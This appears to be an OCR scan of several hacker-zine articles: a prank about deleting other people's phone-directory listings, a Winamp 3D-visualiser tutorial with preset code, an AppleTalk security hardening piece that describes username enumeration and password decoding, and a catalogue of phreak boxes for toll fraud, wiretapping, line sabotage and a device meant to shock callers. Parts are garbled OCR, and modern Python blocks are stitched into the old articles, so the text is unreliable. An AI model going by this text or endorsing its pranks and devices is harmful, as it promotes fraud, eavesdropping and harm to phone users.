You can m pte any pers y account. 
I'm sure Joe Pu Somewhere, USA? won't be
too pleased if his family is looking for his phone
number online and dials Ms. Trixy's House of
Sexy Sexual Sex by mistake. Or if they can't find it
at all. Adding a listing is not a problem, either.
Here's one some fellow posted:
http://www.switchboard.com/bin/ceinbr.dll?1ID=500683995&MEM=1&FUNC=MORE&TYPE=1007.

In retrospect, I suppose you really can't use any
kind of security measure to ensure a random
person doesn't delete your listing. I mean, the
listings end up there one way or another; I know my
father didn't add his listing. He probably put his
name and address on a form somewhere, and
whoosh, he was in a national online directory.

Just thought I'd share this fun little story with
you.

Thanks to CId for showing me the fun I can
have while bored and watching The Mummy
Returns all day, every day. (And I'll see Vel3r and
Real Vonce in school.)
Poor Man's


by diabolik
diabolik@nitric.net

This article will explain how to take those
cheap "3D glasses" you get in cereal boxes and
comic books and use them with Winamp's AVS
studio to create very realistic 3D spectrum
analyzer effects and trip for days. It's pretty simple -
and amazing. When it works, you can get effects
reaching about a foot to two feet out of your
screen toward you. Very trippy. The trick to
achieving a 3D effect from your monitor is a pair
of those old "3D glasses" you'd get as a kid to
turn red and blue lines into a shitty purple picture
that was sort of, but not quite, 3D.

Disclaimer: You can hurt your eyes doing
this. The day after I figured it out, I woke up with
a pretty bad headache. You can experience
anything from nausea to tiredness and just a plain
bad headache. If those "Magic Eye" things weren't
for you, don't attempt this. Use at your own risk -
it's not my fault. Don't blame me.

What You Will Need 

A computer. (Actually, although it's not that
intense graphically, you should have a pretty
good video card. The higher the frame rate, the
nicer this effect looks. More importantly, a low
resolution will force the spectrum analyzers to
cancel each other out more often and will result in
distorted pictures.)

A pair of 3D glasses. (These are the ones with
a piece of red cellophane on one eye and blue
cellophane on the other. The ones I'm using have
red over the left eye and blue over the right. If
yours aren't the same, wear them backwards or mod
my code.)

WinAMP with AVS studio. (These are what I
wrote the "3D mod" presets in.) You'll want to be
fullscreening these effects at 640x480, although
yesterday I was ICQing while I had a portion of
my monitor displaying the AVS and the effect
was noticeable - it hurt a lot more, too.

Booming techno always helps. Aphex Twin,
Clint Mansell... whatever floats your boat.

How to Make the Presets 

You can download the presets from
http://cOnstruk7.hypermart.net/, but I strongly
suggest writing your own. The AVS presets I
wrote are simple spectrum analyzers, a blue
analyzer with a red analyzer offset to the right of
the blue. The more the two are offset, the closer to
your eyes they appear. In Winamp's AVS Studio,
the x and y coordinates of the screen begin at -1
and end at 1, no matter what the resolution is. In
order to make the analyzers appear to be bulging
out of the screen, the offset between the red and
blue analyzers (I'll just refer to this as the offset
from now on) must vary. A good value for the
offset I found was c*cos(2*y)+0.05 for vertical
slopes and c*cos(2*x)+0.05 for horizontal slopes,
where c is a value of from 0.05 to 0.2. (Note:
these values work well for a 14" monitor at about
two feet away. You may have to modify this range
in order to suit your setup.) Since the scopes are
offset horizontally, it is easier to see a vertical
scope in 3D because the two scopes will cancel
each other out less - this is where a higher
resolution comes into play. The higher the detail of
the scopes, the less one scope will overwrite its
companion's position, and the better looking the
result.

To make a throbbing vertical scope, try the
following:

1. Open the AVS Studio. (Start the visualization
and double click in the window.) Make a new
preset.

2. Add a trans/fade (+ -> trans -> fadeout). Set
it to be fast enough - you can slow it later if you
like the effect. Personally I just click on "Main"
and check off "clear every frame" so the effect is
as clean as possible.

3. Add a Superscope (+ -> render ->
Superscope) with the following settings:

Init: n=40; t=0; tv=0.1; dt=1;
Per Frame: t=t*0.9+tv*0.1;
Per Point: x=t+v*(pow(sin(i*3.14159),1)/2)+(0.03*cos(2*y)); y=i*2-1.0; x=x*1.5-0.09;

Check off "Waveform", "Center", and
"Lines". Although you can modify those as you
wish, that's just what I suggest. This will be the
blue scope. To accurately choose your color, see
"Calibrating Your Preset" below.

Click the "x2" button to copy this Superscope.
Modify this one to have the following settings:

Init: n=40; t=0; tv=0.1; dt=1;
On Beat: c=((rand(100)/100)*0.08)+0.07;
Per Frame: t=t*0.9+tv*0.1; c=c*.9;
Per Point: x=t+v*(pow(sin(i*3.14159),1)/2)+(c*cos(2*y))+0.05; y=i*2-1.0; x=x*1.5-0.09;

This is only slightly more complex than a flat
surfaced (in 3-space) scope. When the OnBeat
function is run, the offset between the two scopes
is randomized between 0.07 and 0.15. Every
frame, the offset is reduced to 90 percent of its
previous value (the scope appears to shrink back
towards the screen). Although Winamp's beat
detection isn't that great, during good house music
or anything with good bass, you will definitely
"see" the effect. You can get another neat effect
by making two sets of scopes - one vertical, one
horizontal - and have them come out of the screen
OnBeat random amounts, with or without decay.
To make a 3D horizontal scope, I use the
following settings for each scope:

Blue Scope:

Init: n=40; t=0; tv=0.1; dt=1;
Per Frame: t=t*0.9+tv*0.1;
Per Point: y=t+v*(pow(sin(i*3.14159),1)/2); x=i*2-1.0+(0.03*cos(2*x)); y=y*1.5;

Red Scope:

Init: n=40; t=0; tv=0.1; dt=1;
On Beat: c=((rand(100)/100)*0.07)+0.08;
Per Frame: t=t*0.9+tv*0.1; c=c*.9; (this would
be to decay the scope back to the screen,
otherwise remove the latter equation)
Per Point: y=t+v*(pow(sin(i*3.14159),1)/2); x=i*2-1.0+(c*cos(2*x))+0.05; y=y*1.5;
Blue Scope: 

Init: n=40; t=0; tv=0.1:dt=l; 

Per Frame: t=1*0,9+1v*0, | 

Per Point: y=t+v*{pow(sin(i*3.14159),1 \/2); 
x=1*2-1.04+(0.03*co5(2*x)): 

v=y*1.5; 

Red Scape: 

Init: n=40; t=0; tv=0.1 :dt=1:; 

On Beat: c=((rand( 100)/100)*0.07)+0.08; 

Per Frament=10,94tv*0. 1 ¡c=0c*.9; (this would 
be to decay the scope back ta the screen, other- 
wise remove the latter equation) 

Per Pointry=t+v*(pow(sin( (3.14159), 1 42); 
x=i*2-7.0+(e*cos(2*x))+0.05; 

y=y*1.S; 

Another interesting effect you could try would 
be to change cos(2*x) to abs(cos(4*3.14159*x)), 
This would make two 3D ripples in the analyzer. 
Instead of just coming out once, it would come 
out, go back in, out, and in again. 

What Can’t I Do to the Presets? 

I strongly recommend you make your own -
mine are just working guides. You probably can
do a lot better if you've ever made winamp AVS
settings before - until this project I never tried.
However, don't think that you will throw some
crazy blur effect into the mix and it will be even
more trippy. For this effect to work, the blue pixel
must be immediately offset to the left of the red
pixel for your eyes to combine them into a single
3D point. I've found to get the most effective 3D
effect, keep your presets clean. Whatever effects
you do attempt to add, keep in mind, if the red
and blue lines cross (this is a reference to a
vertical scope - in a horizontal scope, they will
cross all the time), you will lose the 3D effect
immediately.

It would be really interesting to get a dot-plane
working with this effect, but unfortunately
I've found that there are far too many dots at most
angles to not have one dot plane overlap a large
portion of the other. You could do this by writing
an AVS plugin in C++, but that is outside the
scope of this article.
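
The crossing rule for the vertical scope can be checked numerically. This added Python sketch is not the author's AVS code; it assumes each point's x is computed from that point's own y and that rand(100) yields an integer from 0 to 99, and its function names are made up for the illustration.

```python
"""Added illustration: red/blue separation for the vertical-scope preset."""
import math
import random

BLUE_C = 0.03    # fixed cosine amplitude in the blue scope
RED_BIAS = 0.05  # constant added to the red scope's x
SCALE = 1.5      # both scopes finish with x = x*1.5 - 0.09
DECAY = 0.9      # red scope's per-frame c = c*.9


def on_beat(rng):
    """c = ((rand(100)/100)*0.08)+0.07, assuming rand(100) is 0..99."""
    return (rng.randrange(100) / 100) * 0.08 + 0.07


def separation(c, y):
    """Red x minus blue x at height y (y runs from -1 to 1).

    The shared t + v*sin(...)/2 term and the -0.09 shift cancel, so only
    the cosine bulge and the constant bias remain, scaled by 1.5.
    A negative result means the red line has crossed left of the blue.
    """
    return SCALE * ((c - BLUE_C) * math.cos(2 * y) + RED_BIAS)


def max_safe_c():
    """Largest c for which the lines never cross anywhere on screen.

    cos(2*y) is most negative at the top and bottom edges (y = +/-1),
    so that is where the red line is pulled furthest toward the blue.
    """
    return BLUE_C + RED_BIAS / abs(math.cos(2.0))


def simulate(frames, beat_every, seed=0, points=40):
    """Run beats and decay; return (min, max) separation seen."""
    rng = random.Random(seed)
    c = 0.0
    lo, hi = float("inf"), float("-inf")
    for frame in range(frames):
        if frame % beat_every == 0:
            c = on_beat(rng)              # On Beat
        for p in range(points):
            y = (p / (points - 1)) * 2 - 1.0   # y = i*2-1.0, n = 40
            s = separation(c, y)
            lo, hi = min(lo, s), max(hi, s)
        c *= DECAY                        # Per Frame
    return lo, hi


if __name__ == "__main__":
    print("largest c without crossing: %.4f" % max_safe_c())
    print("separation range over a run: %.4f .. %.4f" % simulate(200, 12))
    print("separation at c=0.2, y=1: %.4f" % separation(0.2, 1.0))
```

With these constants the OnBeat ceiling of 0.15 sits just under the crossing threshold, while a c of 0.2 lets the lines cross at the top and bottom edges of the screen.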

What Can I Do with the Presets? 

Noting the limitations above, you can have
some damn cool effects. The most noticeable
thing you can do is modify "c" in the formula
dynamically. WinAMP's AVS Studio contains the
ability to do "OnBeat" modifications to your
variables.

Calibrating Your Preset

To get the best 3D effect, you want the
brightest color of red that still appears dark to the
eye seeing through the blue cellophane, and vice
versa. To find the right shade of blue, double click
on the blue bar near the bottom-right of the
window. Put on your glasses. Close your right eye.
Choose a shade of blue that appears dark to your 
left eye. You should now be looking at the light- 
to-dark blue vertical gradient near the bottom 
right of the color selector through the red cello- 
phane. Move the brightness selector upwards as 
high as it goes while it still appears black, or near 
black. This will make the color as noticeable as 
possible to your right eye while still appearing as 
nothing to your left eye. Click okay, and calibrate 
the second "Render/Superscope" color by doing 
the opposite of what you did for the first. If when 
looking at the presets through the glasses you can 
see what almost looks like shadows of the scopes 
on the screen itself, try darkening the chosen 
shades of blue and red. 

Other Ideas with the Glasses 

Obviously, WinAMP AVS modules are just
one idea for these glasses. With basic VB skillz
one could write 3D wireframing modules or a
starfield generator in pseudo-3D. Of course,
you're limited to the color of purple, but
considering you've paid about a dollar or less for
these you shouldn't really complain. One suggestion
I've had from a friend was to make an hour-long
mixtape, export the whole thing to VHS and bring
the tape, 20 pairs of the glasses, and a lot of
booze/weed/cough syrup/whatever to a party and
have a nice massive trip.

Conclusion 

Well, when it works, it works well. If you
can't get your crazy ass preset to work on the first
try, attempt to simplify it - I've found it's a lot
easier to see two scopes than one, but three or
more need a warm up of simpler effects. Other
things you can try are shifting your head from
side to side - this helps you really see the effect
I've found. If you have too many scopes (four
instead of two), try changing the distance or angle
you're viewing. Just experiment, half the fun's
just seeing what you can come up with. Then
again a good chunk of it is staying up til 4 am
coaxing some cough syrup listening to Aphex
Twin in headphones.

Greetz: HackCanada, argv, clox, the other 
members of Priapism, JaidenKnight, all my local 
friends - you know who you are. 
by Steven Kreuzer
skreuzer@mac.com

By most accounts, Apple clients and servers
make up a small portion of the types of systems on
any given network. However, Apple hardware and
software have carved out a niche in certain areas
such as design and multimedia along with the
educational field. AppleTalk networks do exist. It
is just that hackers and system administrators tend
to overlook them. In mixed environments, the
network managers tend to be highly proficient with
Unix or Windows NT but don't know, or care to
know, about how AppleTalk networks actually
work. They will take the minimum steps necessary
to ensure that Apple clients can connect to
network resources and once that is complete all is
well and good. However, this lack of understanding
can be used as a possible entry point into your
network. This article was written using a Power
Macintosh G4 running OS 9.2.2 and a dual
processor Power Macintosh G4 running OS 9.1
and AppleShare IP 6.3.3. It will address potential
security holes and what you can do to harden both
the client and server side of an AppleTalk network.

We will start off by examining the client side
and one of the most common problems, which also
plagues other network protocols. Older
Macintosh clients connecting to servers will send
their password in clear text across the network. It
is also possible that the server will force the client
to send their password as clear text if it does not
support other authentication algorithms. (Windows
2000 with AppleTalk support will do this.)
This is one of the easiest problems to fix, and you
have two very good solutions at hand. The first is
to download an updated version of the AppleShare
client that is available at
http://www.apple.com/appleshareip/text/downloads.html.
The second solution is a little more complex. If you
open the AppleShare client in ResEdit and locate
the "FSMNT" resource you will see a sub-resource
labeled "ApShare Mounter". Open up that resource
and do a search in ASCII for "Cleartxt". Once
found, replace the "C" in "Cleartxt" with any other
letter. Once that is complete, do the same for the
"ApShare ExFS" in the "EXFS" resource. Once
that is complete, save your changes and move the
file back into the extensions folder on the client
machine. This will prevent the user from sending
their password in clear text.

Another problem is allowing users to save
their login name and password. This creates an
alias to the file server located in the "Servers"
folder. When the machine
boots up, it will mount all file servers listed in that
folder. This can become a problem if an attacker
has physical access to a client machine. It is
possible to modify the AppleShare client so that the
"Save my name and password" feature is disabled.

A patch for that is available at
http://homepage.mac.com/skreuzer.

The last problem I will address on the client
side is personal file sharing. Every Mac OS since
version 7.0 has the ability to allow the end user to
share his or her hard drive and allow remote
connections. Most of the time when a person enables
file sharing they don't assign a password to the
system owner, thus allowing remote logins with
full read and write privileges to the entire hard
drive. Or a person will share the entire hard drive
rather than make share points and give regular
users read and write privileges to the whole hard
drive, including the system folder. This will allow
an attacker access to vital system resources and
also exposes things like preference files which can
contain passwords used by different applications.
It would also be possible to install a trojan or virus
that will execute upon next startup by placing the
file in the "Startup Items" folder. An attacker with
malicious intent could erase certain parts of the
hard drive, or the entire hard drive. To prevent this
from occurring, you can remove the "File Sharing
Extension" from the extensions folder in the
system folder. This will remove the ability to start
personal file sharing.

Both AppleShare IP servers and Macintosh
workstations running personal file sharing store
usernames, passwords and group data in a file
called "Users and Groups Data File" which is
located in the preferences folder of the system
folder. The encryption algorithm is very simple
and it is possible to decode passwords stored in
this file. AppleShare IP does not allow you to
share the system folder, so unless an attacker had
physical access to the server or was able to
execute a trojan on the server side, you should not
have to worry about the trivial encoding scheme
used. macfspwd.c, the Unix utility to decode the
password, is available from
http://happiness.dhs.org/software/macfspwd/macfspwd.c.

The perceived simplicity of AppleShare IP 
(ASIP) makes it appealing to novice administra- 
tors who typically have little appreciation for se- 
curity. Out of the box, ASIP is very secure but 
certain steps can be taken to harden the out of the 
box configuration. One of the biggest drawbacks 
of ASIP is its inability to keep access logs. (The 
web and mail server do log activity, but file shar- 
ing does not.) It is possible to get a list of users 
currently connected to the server, the connection 
method, and when they logged on, but this data is 
not written to any file so once they log off, all this 
information is lost. 

ASIP makes the enumeration of valid usernames
a trivial task due to the fact that security
was sacrificed for ease of use. When you use the
AppleShare client to log onto a server, the return
result from the server can be used to brute force
valid usernames. When an invalid username is
entered, the server responds with a
kOAMErrMemberObjectNotFound (error 29312) which
translates to "Unknown user, invalid password or
the login is disabled....", but when a valid
username with an invalid password is sent, the server
responds with kOAMErrAuthenticationError (error
-29360) which translates to "Sorry, the password
you entered is incorrect...". With this it
would be possible to write a script to read in
usernames from a file and mimic the login process and
parse the result to brute force enumerate valid
usernames. To protect yourself against this, make
sure that the server disables accounts after
multiple failed login attempts. With this feature and a
secure user password in place, brute forcing
becomes much more difficult, if not impossible. The
drawback is that ASIP only allows you to
configure the minimum characters in a password. You
are unable to force a user to mix numbers and
letters, and you are unable to "blacklist" certain
words like "password".
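
The two distinguishable failure results described above, next to a handler that returns one generic failure and locks out after repeated failures, as an added Python model. This is not AppleShare IP code: the accounts, passwords, result strings and the function and class names are constructed for the illustration, and the audit function is the check a defender would run against their own login handler.

```python
"""Added illustration: username oracle in a login handler, and its removal."""
import hashlib
import hmac

SALT = b"constructed-salt"  # fixed so the example is repeatable


def pw_hash(password):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 10_000)


# Constructed accounts, not real data.
USERS = {"alice": pw_hash("correct horse"), "bob": pw_hash("tr0ub4dor")}
DUMMY = pw_hash("placeholder-for-unknown-names")

OK = "ok"
UNKNOWN_USER = "unknown user"   # stands in for kOAMErrMemberObjectNotFound
BAD_PASSWORD = "bad password"   # stands in for kOAMErrAuthenticationError
LOGIN_FAILED = "login failed"   # the single generic failure


def leaky_login(user, password):
    """Behaves as the article describes: two different failure results."""
    stored = USERS.get(user)
    if stored is None:
        return UNKNOWN_USER
    if not hmac.compare_digest(stored, pw_hash(password)):
        return BAD_PASSWORD
    return OK


class HardenedLogin:
    """One failure result for every case, plus lockout after failures."""

    MAX_FAILURES = 3

    def __init__(self):
        # Failures are counted per submitted name, whether or not the
        # account exists, so a lockout cannot be used as a new oracle.
        # A real server would also bound the size of this table.
        self.failures = {}

    def login(self, user, password):
        # Always hash and compare, so unknown names cost the same work.
        stored = USERS.get(user, DUMMY)
        match = hmac.compare_digest(stored, pw_hash(password))
        locked = self.failures.get(user, 0) >= self.MAX_FAILURES
        if user in USERS and match and not locked:
            self.failures.pop(user, None)
            return OK
        self.failures[user] = self.failures.get(user, 0) + 1
        return LOGIN_FAILED


def distinguishable_names(login, candidates, probe="wrong-guess"):
    """Audit check: which names fail differently from a nonexistent one?

    An empty list means the failure result does not reveal whether an
    account exists.
    """
    baseline = login("no-such-account-placeholder", probe)
    return sorted(n for n in candidates if login(n, probe) != baseline)


if __name__ == "__main__":
    names = ["alice", "bob", "mallory", "zed"]
    print("leaky handler reveals:", distinguishable_names(leaky_login, names))
    print("hardened handler reveals:",
          distinguishable_names(HardenedLogin().login, names))
```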

The final topic I will address in this article is
related to user authentication. The algorithms for
all of the AppleShare authentication methods are
public. The most widely used authentication
method is 2 Way randnum that sends two 8 byte
DES encrypted random numbers over the
network. From a computational standpoint the
algorithm is exactly as strong as 56-bit DES and it
has a password length limit of eight characters. It is
vulnerable to an offline password guessing attack
similar to running crack against a Unix passwd
file. Apple has developed a new authentication
method that addresses the weaknesses of 2 Way
randnum, called DHX. DHX uses Diffie-Hellman
key exchange to create a 128-bit session key and
then sends a 64-character password to the server
encrypted with CAST 128. Its strength is
approximately equivalent to 128-bit SSL.

I have only scratched the surface of the
numerous potential vulnerabilities of AppleTalk
networks. In reality, on a well-configured AppleTalk
network, it can be incredibly difficult to bypass
security. But certain tools and techniques can
create access paths into your systems. I hope this
article has sparked an interest, and system
administrators will take a closer look at their
networks.


The Definitive Guide to Phreak Boxes


by Elf Qrin
(www.ElfQrin.com)


Traditionally in the phreaker culture, any
device thought to be connected to a phone line is
called a "box" and is named after a color since the
first "blue box" invented by Captain Crunch, the
father of the phreak scene. Since all colors were
quickly used for this purpose, other fanciful names
began to be used to name boxes.

I've tried to make a definitive list of all the
known "color boxes" with a brief description of
each.

I've done a lot of research to find and classify
them all, reading through about 300 documents. In
most cases I've used quotes from the original
documents for the descriptions.

Since most boxes were invented in the '80s or
early '90s, this article is mainly meant for
informative and historical purposes. Many of these
boxes don't work nowadays. (Some may never
have worked at all.) However, some still do. And
sometimes similar models can even be found in
stores.
I've catalogued 94 phreak boxes of 75 different
kinds (counting only boxes with different
functions), and 17 aliases (same box with a
different name).

| lugged i into he 
| with the ole 1 
E ve also inieliided. five non- -phreak boxes af 
boxes ngt ameant to bel 
ne lit 5-1 ey’ résmeant for use 
ar de mex ing ngle). 
Ao sd OF ie: nds and 17 







sie cea the box, pS E 
of another box.” Gatti 

When the name of a box is included between
square brackets, the box has been created or
reinvented by someone else using a different scheme
and/or different components.

When there's one box that uses the name of an
already existing box (supposedly because the
author was unaware of it), I've added to it a
sequential number between parentheses, such as (2),
(3), etc.
(2600 Box) (another name for the Blue Box).
See Blue Box.

Acrylic Box (aka Extended Bud Box). The
purpose of this box is to get Three-Way Calling,
Call Waiting, programmable Call Forwarding, and
an easier way of extended Bud Boxing, stealing
them from the fortunate ones on your block.
Created by The Pimp.

ALF Box. A tone generator for the Apple IIe
with an ALF Music Synthesizer Card. Created by
Sir Briggs of the SouthCentral Discount
Waremeisters (SCDW) of Texas.

Aqua Box. Every true phreaker lives in fear of
the dreaded F.B.I. "Lock in Trace." For a long
time, it was impossible to escape from the lock in
trace. This box offers an "escape route" by
lowering the voltage on the phone line. Concept by
Captain Xerox. Plans by: The Traveler.

Assassin Box (sometimes misspelled as
Assasin Box, Asassin Box, Asasin Box). A box
designed to scare, harm, or kill people at the phone
by a shock of electricity right in the ear as soon as
the victim starts dialing a number. This box was
designed, because its authors, after trying a
Day-Glo Box for some weeks "were bored and decided
to move on to telephone terrorism." Linked by
Grim Reaper.

[Beagan Box] (sometimes misspelled as
Began Box) [similar to Beige Box, Beige Box
Revisited, Day-Glo Box]. See Beige Box. Concept and
Design: Black Box. Beta Testing: Lord Reagan.

Beige Box [similar to Beagan Box, Beige Box
Revisited, Bud Box, Day-Glo Box]. A homemade
lineman's handset, also known as REMOBS
(REMote OBserving Systems). With a Beige Box you
can do the following things: "Eavesdropping; long
distance, static-free free fone calls to phriends;
dialing direct to Alliance Conferencing (also
static-free); phuking up people; bothering the operator at
little risk to yourself; blue boxing with a greatly
reduced chance of getting caught; anything at all
that you want, since you are an extension on that
line." Invented by The Exterminator and The
Terminal Man. Date: Friday, May 17, 1985.

[Beige Box Revisited] [similar to Beagan Box,
Beige Box, Day-Glo Box]. See Beige Box. By
Mercenary. Year: 1992 or later.

Black Box. A Black Box is a device that is
hooked up to your fone that fixes it so that when
you get a call, the caller doesn't get charged for the
call. This is good for calls up to a half hour. After
that the fone company gets suspicious, and then
you can guess what happens. The original box was
created in the USA. There are modified versions
for other countries. Original author unknown. UK
Black Box by K.5. Reach of The Hackers
Academy (March 1988). Greek Black Box by Fabulist
and Enigma (year 1992).
Blast Box. All a Blast Box is is a really cheap
amplifier (around five watts or so) connected in
place of the microphone on your telephone meant
to talk to someone on the phone who just doesn't
shut up.

Blast Box II. Similar to the Blast Box, but
designed to blow up other people's computers,
instead of their ears.

Bleeper Box [UK version of the Blue Box].
The United Kingdom's own version of the Blue
Box, modified to work with the UK's phone
system. Based on the same principles. However,
British Telecom uses two sets of frequencies,
forward and backward.

Blotto Box. For years now every pirate has
dreamed of the Blotto Box. It was at first made as
a joke to mock more ignorant people into thinking
that the function of it actually was possible. This
box quite simply, can turn off the phone lines
everywhere. Originally conceived by King Blotto.
Created by The Traveler.

Blue Box (aka 2600 Box). The mother of all
boxes: The first box in history which started the
whole phreaking scene. Invented by John Draper
(aka "Captain Crunch") in the early 60's, who
discovered that by sending a tone of 2600Hz over the
telephone lines of AT&T, it was possible to make
free calls. In the 1960's, the makers of Cap'n
Crunch breakfast cereal offered a toy-whistle prize
in every box as a treat for the Cap'n Crunch set.
Somehow John Draper (who called himself
"Captain Crunch" since then) discovered that the toy
whistle just happened to produce a perfect
2600-cycle tone. Discovered by Captain Crunch (John
Draper). Year: early 1960's.

(Blue Con Box) (short name for the Blue
Conference Box). See Blue Conference Box.

Blue Conference Box (aka Blue Con Box). A
Blue Box and a Con Box combined.

Bottle-Nosed Gray Box [selective version of
the Rainbow Box]. This box will do damage to
only your phone, the line between you and your
enemy, and your enemy's modem, whereas the
Rainbow Box just takes everything out. By The
Dolphin that came from Belmont.

[Brown Box] (aka Opaque Box) [similar to
Con Box, Party Box, Three Box]. Created by The
Doc.

Bud Box. This box is quite similar to a Beige
Box, except this is a portable unit. It is extremely
handy for free voice calls and tapping a nearby
house's line. Invented by Dr. D-Code and The
Pimp of The Slaughtered Chicken.

Busy Box. This box is attached to the outside
of the person's house in their telephone box. It
makes it so that when any phone inside that house
is picked up, no dial tone is heard and no calls can
be received or sent. This is good for lame BBS's as
they tend not to call out much, and it will remain
undetected for a longer period of time. Invented by
Black Death.

Charging Box (aka Light Box). This box is
used to indicate when a call is being charged for
and when it is not. Once installed, the box has two
lights, a green one and a red one. Green means free
and red shows that you are being billed. Created
by Stinky Pig Productions (a UK team).

(Chart Box) (short name for the Chartreuse 

| Box). See Chartreuse Box. 

Chartreuse Box (aka Chart Box, Obnoxious 
Box). Your telephone line is a constant power 
source. This box is designed to allow you to tap 
that power source and give you up to 12 volts 
(more if you use a transformer). Created by 
Wonko The Sane. 
Cheese Box. This box (named for the type of box the first one was found in) turns your home phone into a pay phone. It can be used together with a Red Box to make free calls. Created by Otho Radix (?).

Chrome Box. A portable self-contained device to manipulate traffic signals. Not a phreak box. Created by Remote Control. Date: June 14 1988.

Clear Box. This box works on "post-pay" payphones (a kind of payphone that could be found in Canada and in rural United States). In other words, those phones that don't require payment until after the connection has been established. If you don't deposit money, you can't speak to the person at the other end, because your mouthpiece is cut off - but not your earpiece. (Yes, you can make free calls to the weather, etc. from such phones.) With this box the user is able to speak to the other person for free. The clear box thus "clears" up the problem of not being heard. Author: Mr. French of 2600. Originally published in the July 1984 issue of 2600.

Cold Box. Usage unknown. Cited in the Blotto Box document. Created by The Traveler.

Con Box (aka Conference Box) [similar to 
Brown Box, Party Box, Three Box]. This box al- 
lows you to connect two lines in your house to 
give Three-Way type service, creating a party line. 

(Conference Box) (expanded name for the Con Box). See Con Box.

Copper Box. Uses cross-talk feedback to try to damage sensitive equipment of a phone company. More a method than a real box. Conceived by The Cypher. Year: 1986.

Crimson Box (sometimes misspelled as Chrimson Box) [similar to Green Box (2), Orange Box, Hold Box, Hold On Box, White Box (2), Yellow Box (2)]. This box is a very simple device that will allow you to put someone on hold or make your phone busy with a large amount of ease. You flip a switch and the person can't hear you talking. Flip it back and everything is peachy. It doesn't have a LED to show when hold mode is on. Created by Dr. D-Code. Year: 1985.

Dark Box. Multi-Purpose Network Manipulation Unit. This box's basic design allows you to call anywhere on earth without fear of being billed or traced. Created by Cablecast Operator of the Dark Side Research Group. Year: 1987.

[Day-Glo Box] (aka DayGlo Box) [similar to Beige Box]. This box lets you place calls for free with no time limit, no possibility of a wiretap, and the calls can be placed from anywhere in the world. Conceptualized by John F. Kennedy.

Diverti Box. Cited in the Blotto Box document. Probably used to divert a phone call. Created by The Traveler.

Dloc Box. Call/receive on two lines with the option to conference them. By The Dark Lords of Chaos: Prowler, Apprentice, Pro Hack, Zeus, Tarkmeth, Blackstoke, Lazer. Date: October, 3 1988.

DNA Box. Not actually a box but a project of the Outlaw Telecommandos to hack cellular phones in the early era of those devices (1989). Issued in February 1989.

(Extended Bud Box) (another name for the Acrylic Box). See Acrylic Box.

Fuzz Box. This box duplicates the tones of coins dropping down the phone chute, thereby allowing the user to place calls without paying for them.

Gold Box [similar to X-Gold Box]. When you put a gold box on two phone lines it lets anyone who calls one of the lines call out on the other. So when the phone company traces the line it will tell them that you're calling from the line you hooked the gold box up to. By Dr. Revenge, cosysop of Modem Madness (516).

Grab Box. This box uses inductive coupling to join with any radio that uses a coil for an antenna (such as an AM, longwave, or shortwave radio) and allows you to lengthen it considerably. Not a phreak box. This kind of box can be commonly found in an electronic shop. By Shadowspawn.

Green Box. This box generates tones for Coin Collect, Coin Return, and Ringback. It must be used by the CALLED party.

[Green Box (2)] [similar to Crimson Box, Orange Box, Hold Box, Hold On Box, White Box (2), Yellow Box (2)]. A hold button. See Crimson Box.

(Gray Box) (another name for the Silver Box). See Silver Box.

[Hold Box] [similar to Crimson Box, Green Box (2), Orange Box, Hold On Box, White Box (2), Yellow Box (2)]. A hold button. See Crimson Box.

[Hold On Box] [similar to Crimson Box, Green Box (2), Orange Box, Hold Box, White Box (2), Yellow Box (2)]. A hold button. See Crimson Box.

Infinity Box (sometimes misspelled as Infiity Box). When the phone number of a telephone containing an infinity box device is dialed and a certain note is blown into the phone from a Hohner Key of C harmonica, the bugged phone does not ring and, what's more, enables the caller to then hear everything said in the room that the phone is located in. As long as the caller wants to stay on the phone, all is open to him or her. If the phone is lifted off the hook, the transmitter is disconnected and the "bugged" party receives a dial tone as if nothing was wrong with the line. Description by Iron Man of The Crack Shop. From the original "Infinity Transmitter" by Manny Mittleman.

In-Use Light Box. A device that signals whether or not an extension of a particular phone line is off-hook. It does not indicate whether or not a phone is being tapped, and will light whenever any extension is picked up. By The Night Owl AE.

Jack Box. A device to generate tones created starting from a phone keypad.

Jolly Box. Software written in 8086 assembly which generates several phone tones ("Multi-Frequenz-Demon-Dialer for Global Access"). Code by Jolly Reger. Updated by Zaphod Beeblebrox of Control Team. Date: probably 1993 or earlier.

(Light Box) (another name for the Charging 
Box). See Charging Box. 

Loud Box. Makes your voice louder over the 
phone line. Especially meant for use in conference 
calls. Designed, written and built by Mr. Bill. 

Lunch Box (aka Tap Box). The Lunch Box is a 
very simple transmitter used for eavesdropping. It 
is quite small and can easily be put in a number of 
places. Created by Dr. D-Code. 

Magenta Box. When you call up line one from your house, you will get a dial tone almost immediately. Using DTMF you can dial anywhere that the person who owns line two has service to. Which means you can direct dial Alliance, Australia, and your favorite BBS for free. Designed by Street Fighter.

Magenta Box (2). A portable ringing generator which, if connected to a phone line, will make the phone on the end of it ring. It works by using a relay as a vibrator to generate AC which is then stepped up by a transformer and fed through a capacitor into the phone line to make the phone ring.

Mauve Box. Generates a magnetic field to tap the nearest phone conversation (somehow similar to Tempest, the system to tap video screens). Created by Captain Generic with help from The Genetic Mishap. Date: November, 24 1986 - 19:08.

Meeko Box. A multi-purpose box with the following features: It is able to record telephone conversations with excellent quality. It is able to play a source directly into the phone line. It can keep the phone line open. You can box without using a phone, and headphones (requires a modem). Designed by Meeko of Hi-ReS UK. Year: 1994.

Mega Box. A cable rerouter to hook up a second line in your house.

Modu Box (aka Modula Box). A second phone plug attached to an existing one. Designed by Magnus Adept.

(Modula Box) (expanded name for the Modu 
Box). See Modula Box. 

[Music Box] [similar to Pink Box (2)]. It’s ba- 
sically a Pink Box (2) without the LED. See Pink 
Box (2). Created by Aluminium Gerbul. 

Mute Box. This box lets the user receive long 
distance calls without being detected. 


Neon Box (aka Record-o-Box) (erroneously used as an alias for the Blast Box II) [similar to Sound Blaster Box, Rock Box, Slug Box]. A device that adds a normal jack interface to a telephone, allowing the sending of music or tones into the phone line, or the recording of conversations using the microphone input of a recorder. This kind of box can be commonly found in a phone shop.

Noise Box [similar to the Scarlet Box]. It is a device you can attach to a victim's phone line so that an abnormal amount of noise will be present on the line at all times, which would make data transmissions almost impossible and voice communications annoying, to say the least. By Doctor Dissector of Phortune 500.

(Obnoxious Box) (another name for the Chartreuse Box). See Chartreuse Box.

Olive Box. An alternative ring for your phone with a light that also flashes when the phone rings. By Arnold, sysop of Hobbit Hole AE (HHAE) East Branch.

(Opaque Box) (another name for the Brown Box). See Brown Box.

[Orange Box] [similar to Crimson Box, Green Box (2), Hold Box, Hold On Box, White Box (2), Yellow Box (2)]. A hold button. See Crimson Box.

